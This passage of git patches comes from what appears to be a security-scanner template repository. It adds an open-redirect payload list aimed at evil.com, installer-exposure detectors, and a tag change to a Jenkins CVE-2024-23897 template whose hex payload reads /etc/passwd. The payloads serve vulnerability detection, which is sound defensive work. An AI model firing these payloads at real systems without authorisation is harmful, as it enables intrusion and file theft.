'//%69%6e%74%65%72%61%63%74%2e%73%68' - '//evil.com@//' - '//evil.com\tevil.com/' - - '//https://evil.com@//' + - '//https://evil.com//' - '/<>//evil.com' - '/\/\/evil.com/' - '/\/evil.com' @@ -113,6 +113,7 @@ http: - 'login?to=http://evil.com' - '1/_https@evil.com' - 'redirect?targeturl=https://evil.com' + stop-at-first-match: true matchers-condition: and @@ -129,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 490a00463044022054ed0947b0a6d1ee1a622b5540cae6cf6b8181b8954dcac42c504a043329693202200f69ee46e7dba593696f9f0d815c35fbe5e04cb287c702b1ad72efcf152611e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054ed0947b0a6d1ee1a622b5540cae6cf6b8181b8954dcac42c504a043329693202200f69ee46e7dba593696f9f0d815c35fbe5e04cb287c702b1ad72efcf152611e2:922c64590222798bb761d5b6d8e72950 From ff99ea68a6d2c1e77619c44dbffc1204ce4b8489 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 17:38:04 +0000 Subject: [PATCH 1614/1768] Auto Generated Templates Checksum [Fri May 31 17:38:04 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3c09b2b6e4..abef2ce698 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5421,7 +5421,7 @@ http/misconfiguration/installer/cms-made-simple-installer.yaml:bd77905eec6dd6463 http/misconfiguration/installer/codeigniter-installer.yaml:fd1d80362d9f4c812f2a205c0db51bd4a970afc8 http/misconfiguration/installer/combodo-itop-installer.yaml:a7551d44c75895abdb04ecb2762433101a90a11e http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a221e3f9d836d7e402 -http/misconfiguration/installer/confluence-installer.yaml:bae5eaa3593f1211cd203229f56f1f55f0d9d044 +http/misconfiguration/installer/confluence-installer.yaml:47ce659af22841bbb50dd4b2aa4c950f10418da8 http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0 @@ -5494,6 +5494,7 @@ http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b366 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc http/misconfiguration/installer/orangehrm-installer.yaml:b585a129ce905a7583bc1344de4f0909c28bedbc http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0cc1dddc1e0faa37d50 +http/misconfiguration/installer/orchard-installer.yaml:0b14209c229e659f303e8daad41e2f7eda6ddbe3 http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 @@ -7606,7 +7607,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:5dbf91e1a6986d4611a6dba2be2d48e0cf80bbd9 +http/vulnerabilities/generic/open-redirect-generic.yaml:b9579f44cf441d40efd816759d26ef4b85cfe8c2 http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8611,7 +8612,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c92791826e25e6bb4d0934460ab64d4078eb8fe5 +templates-checksum.txt:e9b7ab6b37d090554480984f389267ae1c7150ac wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 11e4ce2a0e77574f22e648ce3509ac5c0dfa27f2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 17:40:57 +0000 Subject: [PATCH 1616/1768] Auto Template Signing [Fri May 31 17:40:57 UTC 2024] :robot: --- http/misconfiguration/installer/orchard-installer.yaml | 1 + http/vulnerabilities/generic/open-redirect-generic.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/orchard-installer.yaml b/http/misconfiguration/installer/orchard-installer.yaml index 0022be5016..a5d2de7897 100644 --- a/http/misconfiguration/installer/orchard-installer.yaml +++ b/http/misconfiguration/installer/orchard-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d895c9a6b7eae3ff7310c91ec1fdab546ffc9eceb6f728df20a5bf1a58af1bde022100bbf55f6f5a08d0e6f7908a8f8a43a84cfd8626290c8bb0b310e192dea72563dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/generic/open-redirect-generic.yaml b/http/vulnerabilities/generic/open-redirect-generic.yaml index f7efaed7db..10879db292 100644 --- a/http/vulnerabilities/generic/open-redirect-generic.yaml +++ b/http/vulnerabilities/generic/open-redirect-generic.yaml @@ -130,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 490a00463044022054ed0947b0a6d1ee1a622b5540cae6cf6b8181b8954dcac42c504a043329693202200f69ee46e7dba593696f9f0d815c35fbe5e04cb287c702b1ad72efcf152611e2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3d3fb8987950e47315ff58d04f5a74e3384d3f31 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 31 May 2024 23:11:54 +0530 Subject: [PATCH 1617/1768] Create easy-wi-installer.yaml --- .../installer/easy-wi-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/easy-wi-installer.yaml diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml new file mode 100644 index 0000000000..4f4691b875 --- /dev/null +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -0,0 +1,34 @@ +id: easy-wi-installer + +info: + name: Easy-WI Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Easy-WI is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + fofa-query: body="Easy-WI Installer" + tags: misconfig,exposure,install,easy-wi + +http: + - method: GET + path: + - "{{BaseURL}}/install/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to the Easy-WI installer!" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b928cbb52bd94db3b5518bbf8dffd2493a3ebf38 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 31 May 2024 22:28:18 +0400 Subject: [PATCH 1618/1768] Update CVE-2024-23897.yaml --- javascript/cves/2024/CVE-2024-23897.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index 1ce87d12b2..8c59f424b6 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -25,7 +25,8 @@ info: vendor: jenkins product: jenkins shodan-query: "product:\"Jenkins\"" - tags: cve,cve2024,lfi,rce,jenkins + tags: cve,cve2024,lfi,rce,jenkins,js + variables: payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" @@ -53,4 +54,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 From 775834d330cbded14f3bc1346f34dd725b83fdbe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 18:28:48 +0000 Subject: [PATCH 1620/1768] Auto Generated Templates Checksum [Fri May 31 18:28:48 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index abef2ce698..087ffde753 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5494,7 +5494,7 @@ http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b366 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc http/misconfiguration/installer/orangehrm-installer.yaml:b585a129ce905a7583bc1344de4f0909c28bedbc http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0cc1dddc1e0faa37d50 -http/misconfiguration/installer/orchard-installer.yaml:0b14209c229e659f303e8daad41e2f7eda6ddbe3 +http/misconfiguration/installer/orchard-installer.yaml:0a64e771b7562362bb57355e673c0dd87c5b0e86 http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 @@ -7607,7 +7607,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:b9579f44cf441d40efd816759d26ef4b85cfe8c2 +http/vulnerabilities/generic/open-redirect-generic.yaml:d846ac7b28a783ecb5a42d54cf3e5c9c9112a15f http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8384,7 +8384,7 @@ javascript/cves/2020/CVE-2020-7247.yaml:60f4be8c576cc07ffa7b843ff99a5678b096df0b javascript/cves/2023/CVE-2023-34039.yaml:af0340b7a937d8e4583b64c5e500566328c6ae51 javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2023/CVE-2023-48795.yaml:cb420dbeb5e653c4a7c056fa2c95d53dd347d29b -javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 +javascript/cves/2024/CVE-2024-23897.yaml:fcd41e7a0767d210fc075e34cd1775b4f2a39625 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f @@ -8612,7 +8612,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e9b7ab6b37d090554480984f389267ae1c7150ac +templates-checksum.txt:aaafa43ba87bc0f6c826b47c6238ecbfea75be99 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3777ab675546176caab2ec7e25a7ff33a108dd68 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 31 May 2024 18:30:28 +0000 Subject: [PATCH 1621/1768] Auto Template Signing [Fri May 31 18:30:28 UTC 2024] :robot: --- javascript/cves/2024/CVE-2024-23897.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index 8c59f424b6..ef4476d1a7 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -54,4 +54,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009620f183855d6c7a8df52675559cce3e55d4a086a6423f9f10ebbfe5a199cc250220154b8ff85e7a379aca2c40226244732b393aebba8e6a965d1b15d200f645245a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e09b9abae3c3d0e5dae4b28549dd092b9a69ac6c Mon Sep 17 00:00:00 2001 From: Rishi Date: Fri, 31 May 2024 19:48:35 +0100 Subject: [PATCH 1622/1768] snowflake favicon hash --- http/technologies/favicon-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 97d338b8eb..813739a59c 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3751,6 +3751,11 @@ http: dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" + - type: dsl + name: "snowflake" + dsl: + - "status_code==200 && (\"307296554\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: From 2fc42cb2a49eb8f82c95127c76b73814f0e101a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 31 May 2024 23:23:20 +0400 Subject: [PATCH 1623/1768] product/queries updated --- http/cves/2000/CVE-2000-0114.yaml | 3 ++- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 3 +++ http/cves/2004/CVE-2004-1965.yaml | 3 ++- http/cves/2005/CVE-2005-3344.yaml | 4 ++-- http/cves/2005/CVE-2005-3634.yaml | 3 ++- http/cves/2006/CVE-2006-2842.yaml | 7 ++++-- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 5 ++-- http/cves/2007/CVE-2007-4504.yaml | 4 ++-- http/cves/2007/CVE-2007-4556.yaml | 4 ++-- http/cves/2007/CVE-2007-5728.yaml | 2 ++ http/cves/2008/CVE-2008-1061.yaml | 3 +-- http/cves/2008/CVE-2008-1547.yaml | 2 ++ http/cves/2008/CVE-2008-2650.yaml | 1 + http/cves/2008/CVE-2008-4764.yaml | 4 ++-- http/cves/2008/CVE-2008-5587.yaml | 4 +++- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 5 ++-- http/cves/2008/CVE-2008-6465.yaml | 2 ++ http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 5 ++-- http/cves/2009/CVE-2009-0545.yaml | 5 +++- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 8 +++++-- http/cves/2009/CVE-2009-1872.yaml | 2 ++ http/cves/2009/CVE-2009-2100.yaml | 4 ++-- http/cves/2009/CVE-2009-3318.yaml | 4 ++-- http/cves/2009/CVE-2009-4202.yaml | 7 ++++-- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 6 +++-- http/cves/2010/CVE-2010-0157.yaml | 6 +++-- http/cves/2010/CVE-2010-0219.yaml | 3 ++- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 5 ++-- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 3 ++- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 3 ++- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 ++ http/cves/2010/CVE-2010-1461.yaml | 3 ++- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 3 ++- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 3 ++- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 3 ++- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 3 +++ http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 3 ++- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 3 ++- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 4 ++-- http/cves/2010/CVE-2010-2037.yaml | 4 ++-- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 3 ++- http/cves/2010/CVE-2010-2861.yaml | 4 +++- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 4 ++-- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 6 +++-- http/cves/2010/CVE-2010-4282.yaml | 3 +++ http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 5 ++-- http/cves/2010/CVE-2010-5286.yaml | 4 ++-- http/cves/2011/CVE-2011-0049.yaml | 4 ++-- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 ++ http/cves/2011/CVE-2011-4640.yaml | 7 ++++-- http/cves/2011/CVE-2011-4804.yaml | 4 ++-- http/cves/2011/CVE-2011-4926.yaml | 3 +-- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 5 ++-- http/cves/2011/CVE-2011-5265.yaml | 3 +-- http/cves/2012/CVE-2012-0392.yaml | 7 ++++-- http/cves/2012/CVE-2012-0394.yaml | 2 ++ http/cves/2012/CVE-2012-0896.yaml | 4 ++-- http/cves/2012/CVE-2012-0901.yaml | 6 ++--- http/cves/2012/CVE-2012-0981.yaml | 5 ++-- http/cves/2012/CVE-2012-0991.yaml | 7 ++++-- http/cves/2012/CVE-2012-0996.yaml | 4 ++-- http/cves/2012/CVE-2012-1226.yaml | 6 +++-- http/cves/2012/CVE-2012-1823.yaml | 6 ++--- http/cves/2012/CVE-2012-1835.yaml | 5 ++-- http/cves/2012/CVE-2012-2371.yaml | 5 ++-- http/cves/2012/CVE-2012-3153.yaml | 5 +++- http/cves/2012/CVE-2012-4242.yaml | 5 ++-- http/cves/2012/CVE-2012-4273.yaml | 3 +-- http/cves/2012/CVE-2012-4547.yaml | 1 + http/cves/2012/CVE-2012-4768.yaml | 3 ++- http/cves/2012/CVE-2012-4878.yaml | 4 ++-- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 5 ++-- http/cves/2012/CVE-2012-5913.yaml | 3 +-- http/cves/2012/CVE-2012-6499.yaml | 4 ++-- http/cves/2013/CVE-2013-1965.yaml | 3 +++ http/cves/2013/CVE-2013-2248.yaml | 7 ++++-- http/cves/2013/CVE-2013-2251.yaml | 3 +++ http/cves/2013/CVE-2013-2287.yaml | 5 ++-- http/cves/2013/CVE-2013-3526.yaml | 4 ++-- http/cves/2013/CVE-2013-3827.yaml | 3 +++ http/cves/2013/CVE-2013-4117.yaml | 3 +-- http/cves/2013/CVE-2013-4625.yaml | 3 +-- http/cves/2013/CVE-2013-5979.yaml | 4 ++-- http/cves/2013/CVE-2013-6281.yaml | 4 ++-- http/cves/2013/CVE-2013-7091.yaml | 3 +++ http/cves/2013/CVE-2013-7240.yaml | 4 ++-- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 5 ++-- http/cves/2014/CVE-2014-2323.yaml | 3 ++- http/cves/2014/CVE-2014-2383.yaml | 4 ++-- http/cves/2014/CVE-2014-2908.yaml | 4 ++-- http/cves/2014/CVE-2014-2962.yaml | 4 ++-- http/cves/2014/CVE-2014-3120.yaml | 3 ++- http/cves/2014/CVE-2014-3744.yaml | 3 ++- http/cves/2014/CVE-2014-4210.yaml | 6 +++-- http/cves/2014/CVE-2014-4536.yaml | 4 ++-- http/cves/2014/CVE-2014-4539.yaml | 3 +-- http/cves/2014/CVE-2014-4558.yaml | 4 ++-- http/cves/2014/CVE-2014-4561.yaml | 3 +-- http/cves/2014/CVE-2014-4940.yaml | 4 ++-- http/cves/2014/CVE-2014-5258.yaml | 1 + http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 5 ++-- http/cves/2014/CVE-2014-8676.yaml | 2 ++ http/cves/2014/CVE-2014-8682.yaml | 2 ++ http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 5 ++-- http/cves/2014/CVE-2014-9444.yaml | 5 ++-- http/cves/2014/CVE-2014-9606.yaml | 3 ++- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 3 ++- http/cves/2015/CVE-2015-1000005.yaml | 4 ++-- http/cves/2015/CVE-2015-1427.yaml | 5 ++-- http/cves/2015/CVE-2015-1503.yaml | 2 ++ http/cves/2015/CVE-2015-1579.yaml | 4 ++-- http/cves/2015/CVE-2015-1635.yaml | 4 ++-- http/cves/2015/CVE-2015-1880.yaml | 2 ++ http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 5 ++-- http/cves/2015/CVE-2015-2166.yaml | 4 ++-- http/cves/2015/CVE-2015-2196.yaml | 4 ++-- http/cves/2015/CVE-2015-2755.yaml | 4 ++-- http/cves/2015/CVE-2015-2807.yaml | 3 +-- http/cves/2015/CVE-2015-2996.yaml | 1 + http/cves/2015/CVE-2015-3035.yaml | 4 +++- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 5 ++-- http/cves/2015/CVE-2015-4050.yaml | 3 ++- http/cves/2015/CVE-2015-4062.yaml | 4 ++-- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 4 ++-- http/cves/2015/CVE-2015-4455.yaml | 5 ++-- http/cves/2015/CVE-2015-4632.yaml | 1 + http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 4 ++-- http/cves/2015/CVE-2015-5531.yaml | 3 ++- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 4 ++-- http/cves/2015/CVE-2015-7297.yaml | 2 ++ http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 3 ++- http/cves/2015/CVE-2015-7780.yaml | 3 +++ http/cves/2015/CVE-2015-7823.yaml | 3 +++ http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 4 ++-- http/cves/2015/CVE-2015-9480.yaml | 4 ++-- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 3 +-- http/cves/2016/CVE-2016-1000127.yaml | 3 +-- http/cves/2016/CVE-2016-1000131.yaml | 5 ++-- http/cves/2016/CVE-2016-1000133.yaml | 3 +-- http/cves/2016/CVE-2016-1000137.yaml | 5 ++-- http/cves/2016/CVE-2016-1000138.yaml | 4 ++-- http/cves/2016/CVE-2016-1000141.yaml | 3 +-- http/cves/2016/CVE-2016-1000142.yaml | 3 +-- http/cves/2016/CVE-2016-1000148.yaml | 3 +-- http/cves/2016/CVE-2016-1000149.yaml | 3 +-- http/cves/2016/CVE-2016-1000154.yaml | 3 +-- http/cves/2016/CVE-2016-1000155.yaml | 3 +-- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 1 + http/cves/2016/CVE-2016-10134.yaml | 3 +++ http/cves/2016/CVE-2016-10367.yaml | 2 ++ http/cves/2016/CVE-2016-10368.yaml | 3 +++ http/cves/2016/CVE-2016-10924.yaml | 5 ++-- http/cves/2016/CVE-2016-10956.yaml | 5 ++-- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 3 +-- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 1 + http/cves/2016/CVE-2016-3081.yaml | 3 +++ http/cves/2016/CVE-2016-3088.yaml | 1 + http/cves/2016/CVE-2016-3978.yaml | 2 ++ http/cves/2016/CVE-2016-4975.yaml | 3 ++- http/cves/2016/CVE-2016-5674.yaml | 5 ++-- http/cves/2016/CVE-2016-6195.yaml | 4 +++- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 4 +++- http/cves/2016/CVE-2016-8527.yaml | 5 ++-- http/cves/2017/CVE-2017-0929.yaml | 1 + http/cves/2017/CVE-2017-1000028.yaml | 3 ++- http/cves/2017/CVE-2017-1000029.yaml | 1 + http/cves/2017/CVE-2017-10075.yaml | 3 ++- http/cves/2017/CVE-2017-10271.yaml | 3 +++ http/cves/2017/CVE-2017-11165.yaml | 2 ++ http/cves/2017/CVE-2017-11444.yaml | 5 ++-- http/cves/2017/CVE-2017-11512.yaml | 2 ++ http/cves/2017/CVE-2017-11610.yaml | 6 +++-- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 5 +++- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 6 +++-- 